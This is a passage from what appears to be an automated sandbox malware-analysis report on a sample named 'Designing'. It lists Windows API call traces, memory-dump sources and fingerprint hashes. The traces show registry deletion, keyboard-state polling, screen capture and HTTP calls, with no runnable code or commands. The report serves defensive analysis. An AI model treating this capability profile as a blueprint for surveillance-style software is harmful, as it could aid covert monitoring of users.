• InternetCloseHandle.WININET(00000000), ref: 00E1D040
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
• String ID:
• API String ID: 3800310941-3916222277
• Opcode ID: 05314d38c6b7c72a32e96e2164224d617313c419095cee4e71f9e6203503810c
• Instruction ID: 5d097a08b6f210996596bad15de2e790583821341e907ccd531f1028a9ace733
• Opcode Fuzzy Hash: 05314d38c6b7c72a32e96e2164224d617313c419095cee4e71f9e6203503810c
• Instruction Fuzzy Hash: 915148B1604608BFDB219F61DC88AEB7BFDFB08748F10541AF945E6250D734D989AB60
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00E366D6,?,?), ref: 00E38FEE
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00E366D6,?,?,00000000,?), ref: 00E38FFE
• GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00E366D6,?,?,00000000,?), ref: 00E39009
• CloseHandle.KERNEL32(00000000,?,?,?,?,00E366D6,?,?,00000000,?), ref: 00E39016
• GlobalLock.KERNEL32(00000000), ref: 00E39024
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E366D6,?,?,00000000,?), ref: 00E39033
• GlobalUnlock.KERNEL32(00000000), ref: 00E3903C
• CloseHandle.KERNEL32(00000000,?,?,?,?,00E366D6,?,?,00000000,?), ref: 00E39043
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E366D6,?,?,00000000,?), ref: 00E39054
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00E40C04,?), ref: 00E3906D
• GlobalFree.KERNEL32(00000000), ref: 00E3907D
• GetObjectW.GDI32(00000000,00000018,?), ref: 00E3909D
• CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00E390CD
• DeleteObject.GDI32(00000000), ref: 00E390F5
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E3910B
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: 7faf6e3d75dc9f53815579e542dad870bcad3a3c53a043424cb619e6efe2697f
• Instruction ID: 42b1054531e7a2c7da1677940125a16e0909cd1efe1601427285e0bde99563a1
• Opcode Fuzzy Hash: 7faf6e3d75dc9f53815579e542dad870bcad3a3c53a043424cb619e6efe2697f
• Instruction Fuzzy Hash: 28411675600208AFDB119F66EC8CEABBFB8EB89715F108058F915EB261D7709945DB20
APIs
  • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
  • Part of subcall function 00E2D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E2C10E,?,?), ref: 00E2D415
  • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D451
  • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D4C8
  • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E2C154
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E2C1D2
• RegDeleteValueW.ADVAPI32(?,?), ref: 00E2C26A
• RegCloseKey.ADVAPI32(?), ref: 00E2C2DE
• RegCloseKey.ADVAPI32(?), ref: 00E2C2FC
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 00E2C352
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E2C364
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00E2C382
• FreeLibrary.KERNEL32(00000000), ref: 00E2C3E3
• RegCloseKey.ADVAPI32(00000000), ref: 00E2C3F4
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 146587525-4033151799
• Opcode ID: 32a1510951d18a6286a6e7b9a60610720404f445b2aca1b47dffa6bc8ebe4495
• Instruction ID: 72e732cf71ff52b1c7e10425d7d5712618b572355ef27e4cb5b2af2b865ae702
• Opcode Fuzzy Hash: 32a1510951d18a6286a6e7b9a60610720404f445b2aca1b47dffa6bc8ebe4495
• Instruction Fuzzy Hash: 15C18035208211AFD714DF14D895F2ABBE1FF45318F24989CF456AB2A2CB71EC46CBA1
APIs
  • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
• GetSystemMetrics.USER32(0000000F), ref: 00E3A990
• GetSystemMetrics.USER32(00000011), ref: 00E3A9A7
• GetSystemMetrics.USER32(00000004), ref: 00E3A9B3
• GetSystemMetrics.USER32(0000000F), ref: 00E3A9C9
• MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00E3AC15
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E3AC33
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E3AC54
• ShowWindow.USER32(00000003,00000000), ref: 00E3AC73
• InvalidateRect.USER32(?,00000000,00000001), ref: 00E3AC95
• DefDlgProcW.USER32(?,00000005,?), ref: 00E3ACBB
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
• String ID: @$(
• API String ID: 3962739598-2721164788
• Opcode ID: 69df01873972318f4ae0ab3252215b85b5734d353cd3666fed4a1d7458bd6b67
• Instruction ID: 3c80358f91fa995a785831b7b89ad4c89eee81d758e4fbd0b02637cd5c8e7b1f
• Opcode Fuzzy Hash: 69df01873972318f4ae0ab3252215b85b5734d353cd3666fed4a1d7458bd6b67
• Instruction Fuzzy Hash: 36B18C31500219DFDF14CF69C9887BEBBF2BF44704F18A079ED84AA295D771A980CB51
APIs
  • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E397B6
• GetFocus.USER32 ref: 00E397C6
• GetDlgCtrlID.USER32(00000000), ref: 00E397D1
• DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00E39879
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E3992B
• GetMenuItemCount.USER32(?), ref: 00E39948
• GetMenuItemID.USER32(?,00000000), ref: 00E39958
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E3998A
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E399CC
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E399FD
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                              • String ID: 0$(
                                                                                                                                                                              • API String ID: 1026556194-1385328161
                                                                                                                                                                              • Opcode ID: 31b6464b9ae9a0bd5031f5428c2d65e4ba7ce5eefabca960cc379e0446be3547
                                                                                                                                                                              • Instruction ID: 4a9ca2d8813404a21a7c454f8ec5f0748cb9aa25af2b4a2bf8cd1818eddcdf31
                                                                                                                                                                              • Opcode Fuzzy Hash: 31b6464b9ae9a0bd5031f5428c2d65e4ba7ce5eefabca960cc379e0446be3547
                                                                                                                                                                              • Instruction Fuzzy Hash: 4C81BD715083019FD714CF25D889AABBFE8FBC9318F04191DF995A7292C7B1D905CBA2
APIs
• GetDC.USER32(00000000), ref: 00E23035
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00E23045
• CreateCompatibleDC.GDI32(?), ref: 00E23051
• SelectObject.GDI32(00000000,?), ref: 00E2305E
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00E230CA
• GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00E23109
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00E2312D
• SelectObject.GDI32(?,?), ref: 00E23135
• DeleteObject.GDI32(?), ref: 00E2313E
• DeleteDC.GDI32(?), ref: 00E23145
• ReleaseDC.USER32(00000000,?), ref: 00E23150
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: e261f78895235b2d9caab2492a30c0657448d3d7d82739d76dd42c2370a7dbfd
• Instruction ID: b32fecce9a84472e4826d47ac67771dce513c60167a2a134e3bca577476cb810
• Instruction Fuzzy Hash: 7961F0B1904219AFCB04CFA4E888EAEBBB6FF48310F208519E555B7250D775AA418FA0
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 00E052E6
• GetWindowTextW.USER32(?,?,00000400), ref: 00E05328
• _wcslen.LIBCMT ref: 00E05339
• CharUpperBuffW.USER32(?,00000000), ref: 00E05345
• _wcsstr.LIBVCRUNTIME ref: 00E0537A
• GetClassNameW.USER32(00000018,?,00000400), ref: 00E053B2
• GetWindowTextW.USER32(?,?,00000400), ref: 00E053EB
• GetClassNameW.USER32(00000018,?,00000400), ref: 00E05445
• GetClassNameW.USER32(?,?,00000400), ref: 00E05477
• GetWindowRect.USER32(?,?), ref: 00E054EF
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
• String ID: ThumbnailClass
• API String ID: 1311036022-1241985126
• Opcode ID: ac05c4fd7af23ebfd608bcb4acc408072078f67ff3291757bfd3aef2fc6c910e
• Instruction ID: ad4329170f393e832147985a9bd25e6ff933faee1e3a22bfe08177cb7fbb6426
• Instruction Fuzzy Hash: 3591D372104B06AFD704DF24D895BABB7A9FF01308F105519FA96A20D1EB31ED95CFA1
APIs
• GetMenuItemInfoW.USER32(00E729C0,000000FF,00000000,00000030), ref: 00E0C973
• SetMenuItemInfoW.USER32(00E729C0,00000004,00000000,00000030), ref: 00E0C9A8
• Sleep.KERNEL32(000001F4), ref: 00E0C9BA
• GetMenuItemCount.USER32(?), ref: 00E0CA00
• GetMenuItemID.USER32(?,00000000), ref: 00E0CA1D
• GetMenuItemID.USER32(?,-00000001), ref: 00E0CA49
• GetMenuItemID.USER32(?,?), ref: 00E0CA90
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E0CAD6
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E0CAEB
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E0CB0C
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep
• String ID: 0
• API String ID: 1460738036-4108050209
• Opcode ID: 27e8db84d4b128eb27b6001ad3b891bfd2ac770c5ff3dcd046b85919e273104a
• Instruction ID: 56ab0d40137b6952184be01422959a514d65432b89dfc984306d216c9365b3c8
• Instruction Fuzzy Hash: 2A618E70A0024AAFDF11CFA4DC89AFE7BB8FB05348F241615E956B3191D730AD85CB61
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E0E4D4
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E0E4FA
• _wcslen.LIBCMT ref: 00E0E504
• _wcsstr.LIBVCRUNTIME ref: 00E0E554
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E0E570
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1939486746-1459072770
• Opcode ID: 661607ba414fc3a297254029bf83adab4a30be65c710091a0fffba88c08230ed
• Instruction ID: 668ceead7bbef1f0ff442cd29bd316dd96091e06257654854bd22de558245e1d
• Instruction Fuzzy Hash: DB413432544319BAEB00ABA4AC0BFBFBB6CDF51310F10156AF900B71C2EB759A4192B1
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00E2D6C4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00E2D6ED
• FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00E2D7A8
  • Part of subcall function 00E2D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00E2D70A
  • Part of subcall function 00E2D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00E2D71D
  • Part of subcall function 00E2D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E2D72F
  • Part of subcall function 00E2D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00E2D765
  • Part of subcall function 00E2D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00E2D788
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00E2D753
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2734957052-4033151799
APIs
• timeGetTime.WINMM ref: 00E0EFCB
  • Part of subcall function 00DBF215: timeGetTime.WINMM(?,?,00E0EFEB), ref: 00DBF219
• Sleep.KERNEL32(0000000A), ref: 00E0EFF8
• EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00E0F01C
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E0F03E
• SetActiveWindow.USER32 ref: 00E0F05D
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E0F06B
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00E0F08A
• Sleep.KERNEL32(000000FA), ref: 00E0F095
• IsWindow.USER32 ref: 00E0F0A1
• EndDialog.USER32(00000000), ref: 00E0F0B2
Strings
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
APIs
  • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E0F374
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E0F38A
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E0F39B
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E0F3AD
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E0F3BE
Strings
Similarity
• API ID: SendString$_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2420728520-1007645807
APIs
• _free.LIBCMT ref: 00DD3007
  • Part of subcall function 00DD2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00DDDB51,00E71DC4,00000000,00E71DC4,00000000,?,00DDDB78,00E71DC4,00000007,00E71DC4,?,00DDDF75,00E71DC4), ref: 00DD2D4E
  • Part of subcall function 00DD2D38: GetLastError.KERNEL32(00E71DC4,?,00DDDB51,00E71DC4,00000000,00E71DC4,00000000,?,00DDDB78,00E71DC4,00000007,00E71DC4,?,00DDDF75,00E71DC4,00E71DC4), ref: 00DD2D60
• _free.LIBCMT ref: 00DD3013
• _free.LIBCMT ref: 00DD301E
• _free.LIBCMT ref: 00DD3029
• _free.LIBCMT ref: 00DD3034
• _free.LIBCMT ref: 00DD303F
• _free.LIBCMT ref: 00DD304A
• _free.LIBCMT ref: 00DD3055
• _free.LIBCMT ref: 00DD3060
• _free.LIBCMT ref: 00DD306E
Strings
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID: &
• API String ID: 776569668-2586148540
APIs
• GetKeyboardState.USER32(?), ref: 00E0A9D9
• SetKeyboardState.USER32(?), ref: 00E0AA44
• GetAsyncKeyState.USER32(000000A0), ref: 00E0AA64
• GetKeyState.USER32(000000A0), ref: 00E0AA7B
• GetAsyncKeyState.USER32(000000A1), ref: 00E0AAAA
• GetKeyState.USER32(000000A1), ref: 00E0AABB
• GetAsyncKeyState.USER32(00000011), ref: 00E0AAE7
• GetKeyState.USER32(00000011), ref: 00E0AAF5
• GetAsyncKeyState.USER32(00000012), ref: 00E0AB1E
• GetKeyState.USER32(00000012), ref: 00E0AB2C
• GetAsyncKeyState.USER32(0000005B), ref: 00E0AB55
• GetKeyState.USER32(0000005B), ref: 00E0AB63
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 541375521-0
                                                                                                                                                                              • Opcode ID: 68f7451164328ba1d6d62881d3489f610cd5db593243a91430dda62f08d4b6d2
                                                                                                                                                                              • Instruction ID: caaf33c762b1b8d9c1bcde839dff3b8e5b6001e61b2ecdd66ad86591e639c16a
                                                                                                                                                                              • Opcode Fuzzy Hash: 68f7451164328ba1d6d62881d3489f610cd5db593243a91430dda62f08d4b6d2
                                                                                                                                                                              • Instruction Fuzzy Hash: 7E51F720A0478C29FB35D7609854BEABFF59F51348F4C55A9C5C22B1C2DA649BCCCB63
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00E06649
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00E06662
                                                                                                                                                                              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00E066C0
                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00E066D0
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00E066E2
                                                                                                                                                                              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00E06736
                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00E06744
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00E06756
                                                                                                                                                                              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00E06798
                                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00E067AB
                                                                                                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E067C1
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00E067CE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3096461208-0
                                                                                                                                                                              • Opcode ID: beb0e0377ab55e75ad8c7b39102993afb9ba4adc4243af0f7a7cb66a3901176a
                                                                                                                                                                              • Instruction ID: 97275ec8f3c903f32006ce0a0c36913557fe2726780c5f6c42066fe45884f62e
                                                                                                                                                                              • Opcode Fuzzy Hash: beb0e0377ab55e75ad8c7b39102993afb9ba4adc4243af0f7a7cb66a3901176a
                                                                                                                                                                              • Instruction Fuzzy Hash: 74510DB1A00209AFDB18CF69DD89BAEBBB5FB48314F148129F919F7290D7709E548B50
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA2234: GetWindowLongW.USER32(?,000000EB), ref: 00DA2242
                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00DA2152
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ColorLongWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 259745315-0
                                                                                                                                                                              • Opcode ID: 7c732a6dceb59a77cb1a25a4080f153fb963e7135324da3fc79b596ef89fadee
                                                                                                                                                                              • Instruction ID: 6d8cc26a2097aebdd4d7e777796404b8a5a904e8f0e216845c92aa07e031ac82
                                                                                                                                                                              • Opcode Fuzzy Hash: 7c732a6dceb59a77cb1a25a4080f153fb963e7135324da3fc79b596ef89fadee
                                                                                                                                                                              • Instruction Fuzzy Hash: 8341B431205784AFDB255F3E9C48BB93B75AB42330F194659FAA29B2E1C7318D42DB20
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00DE28D1
                                                                                                                                                                              • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00DE28EA
                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DE28FA
                                                                                                                                                                              • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00DE2912
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DE2933
                                                                                                                                                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00DA11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00DE2942
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DE295F
                                                                                                                                                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00DA11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00DE296E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 1268354404-2063206799
                                                                                                                                                                              • Opcode ID: f53f690b4ff73c755abb77106c2da9d747e68a29c0074ee6a4ef67d5f7392e6e
                                                                                                                                                                              • Instruction ID: 01c522f7c18cc5f2d397df836aff7fa51bc94fc26918bd61a28da04533b32e84
